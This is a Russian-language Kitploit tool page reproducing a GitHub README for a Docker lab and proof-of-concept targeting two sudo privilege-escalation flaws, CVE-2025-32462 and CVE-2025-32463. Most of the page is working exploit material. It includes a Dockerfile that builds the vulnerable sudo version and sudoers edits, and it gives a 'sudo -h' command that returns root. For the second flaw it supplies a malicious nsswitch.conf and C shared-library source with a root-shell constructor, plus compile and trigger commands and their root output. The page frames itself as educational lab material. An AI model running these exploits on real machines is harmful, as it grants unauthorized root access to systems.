Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32462_32463-Lab — Docker PoC для CVE-2025-32462 и CVE-2025-32463 (sudo), основанный на исследовании Stratascale CRU. | Kitploit
Инструменты/GitHubGitHub/maaythm/cve-2025-32462_32463-lab
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubmaaythm/cve-2025-32462_32463-lab

CVE-2025-32462_32463-Lab

Docker PoC для CVE-2025-32462 и CVE-2025-32463 (sudo), основанный на исследовании Stratascale CRU.

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32462 & CVE-2025-32463 – PoC лаборатория

Это контейнерная лаборатория и PoC для следующих уязвимостей в sudo:

  • CVE-2025-32462 – обход логики сопоставления хостов sudo -h
  • CVE-2025-32463 – обход NSS библиотеки chroot sudo -R

🔒 Только для образовательных целей. Не используйте на системах, которыми вы не владеете или на тестирование которых не имеете разрешения.


🔬 Оригинальное исследование

  • Пост в блоге для CVE-2025-32462: повышение привилегий через псевдонимы хостов sudo
  • Пост в блоге для CVE-2025-32463: обход NSS chroot sudo

🧠 Авторы исследования

  • Rich Mirch
    Stratascale Cyber Research Unit (CRU)
    @Stratascale

🧪 Настройка лаборатории (Docker)

🔧 Dockerfile

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \\
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \\
                       pkg-config libssl-dev git nano gcc && \\
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \\
    tar xzf sudo-1.9.16p2.tar.gz && \\
    cd sudo-1.9.16p2 && \\
    ./configure --disable-gcrypt --prefix=/usr && make && make install

RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

🚀 Сборка и запуск

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null

дополнительная настройка для CVE-2025-32462

root@kitploit:~
docker exec -u root -it lowpriv bash

# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

Ручная эксплуатация

CVE-2025-32462

Нормальная работа

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required

Эксплуатация

root@kitploit:~
pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)

pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local

CVE-2025-32463

Нормальная работа

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: 
pwn is not allowed to run sudo on lowpriv.

Подготовка

root@kitploit:~
# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc

# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf

# Step 3: Create directory for the malicious NSS library
mkdir libnss_

# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/

# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT

root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

Отказ от ответственности

Этот PoC предназначен только для образовательных и авторизованных исследований.


✍️ Автор

Лаборатория PoC и окружение Docker от MAAYTHM.

Авторство исследования: Rich Mirch – Stratascale CRU

Скачать инструмент